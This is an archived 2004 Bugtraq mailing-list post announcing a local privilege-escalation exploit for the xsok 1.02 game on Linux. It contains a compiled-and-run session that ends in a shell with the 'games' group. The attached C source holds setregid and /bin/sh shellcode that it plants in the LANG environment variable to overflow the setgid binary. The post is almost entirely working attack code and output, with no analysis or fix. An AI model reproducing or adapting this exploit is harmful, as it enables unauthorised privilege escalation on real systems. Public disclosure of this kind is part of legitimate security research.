[32986] in bugtraq
xsok local games exploit
daemon@ATHENA.MIT.EDU (c0wboy@0x333)
Fri Jan 2 16:09:35 2004
Message-ID: <003a01c3d14e$6c927e20$3ffe5452@c0wboy>
From: "c0wboy@0x333" <c0wboy@tiscali.it>
To: <bugtraq@securityfocus.com>
Date: Fri, 2 Jan 2004 17:35:22 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0033_01C3D156.CC6883A0"
------=_NextPart_000_0033_01C3D156.CC6883A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
-tested under Red Hat 8.0-
[c0wboy@0x333 test]$ gcc 0x333xsok.c -o exp
[c0wboy@0x333 test]$ ./exp
--- 0x333xsok => xsok 1.02 local games exploit ---
--- Outsiders Se(c)urity Labs 2003 ---
sh-2.05b$ id
uid=500(c0wboy) gid=20(games) groups=500(c0wboy)
sh-2.05b$ exit
exit
[c0wboy@0x333 test]$
------=_NextPart_000_0033_01C3D156.CC6883A0
Content-Type: application/octet-stream;
name="0x333xsok.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="0x333xsok.c"
/* 0x333xsok =3D> xsok 1.02 local game exploit
*
* Happy new year !
* coded by c0wboy=20
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include <stdio.h>
#include <unistd.h>
#define BIN "/usr/games/xsok"
#define RETADD 0xbffff3b8
#define SIZE 100
unsigned char shellcode[] =3D
/* setregid (20,20) shellcode */
"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
"\xcd\x80"
/* exec /bin/sh shellcode */
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
=09
int main (int argc, char ** argv)
{
int i, ret =3D RETADD;
char out[SIZE];
fprintf(stdout, "\n --- 0x333xsok =3D> xsok 1.02 local games exploit =
---\n");
fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 =
---\n\n");
int *xsok =3D (int *)(out);
for (i=3D0; i<SIZE-1 ; i+=3D4, *xsok++ =3D ret);
memcpy((char *)out, shellcode, strlen(shellcode));
setenv("LANG", out, 0x333); /* :) */
execl (BIN, BIN, 0x0);
}
------=_NextPart_000_0033_01C3D156.CC6883A0--
